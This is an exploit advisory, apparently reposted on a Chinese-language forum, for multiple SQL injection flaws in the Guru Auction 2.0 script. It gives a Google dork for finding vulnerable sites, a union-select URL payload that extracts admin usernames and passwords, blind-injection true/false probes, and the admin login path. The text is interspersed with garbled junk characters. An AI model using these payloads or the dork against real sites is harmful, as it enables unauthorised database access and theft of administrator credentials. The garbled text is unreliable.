Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
( P) t+ s0 s0 c4 a6 u5 {
# ?' T2 j# u+ q" ]作者 : v3n0m6 z" V/ t/ B$ v: S6 _
应用 : Guru Auction 2.0
5 M- d! ]* m, dPrice : $49
% j9 W6 f n1 N _* r! AVendor : http://www.guruscript.com/" I3 W* a; N3 A% K4 }
Google Dork : inurl:subcat.php?cate_id=" [: D- g0 P4 M) N+ o3 l
* q4 ?0 d. x- {/ N( c5 g8 [SQLi p0c:+ F* h, a7 ^2 Y' S1 C9 R" J
~~~~~~~~~~
2 k1 b2 t# X; P" ^3 Y! s2 c, G& Chttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
$ R3 @: K6 d' Q7 t! `. G: T ( t8 t# V! H3 a7 o, ^4 F6 _
* T) b/ i4 \3 B+ B* s) P% t2 T盲注 p0c:( A) z" ]: |8 l( D; y
~~~~~~~~~~
9 l8 ^$ k1 X- \1 Ahttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
& v# o4 [+ V+ S# uhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
" p' U! d9 p" q- y6 f! q3 N6 R: b : I8 }, h5 C* v
管理登录入口:
7 r. }: g" I2 ~~~~~~~~~~~1 p4 X: C( w+ a+ `% X1 p: b7 ^
http://domain.tld/[path]/admin/1 p. q/ W' B; Z
|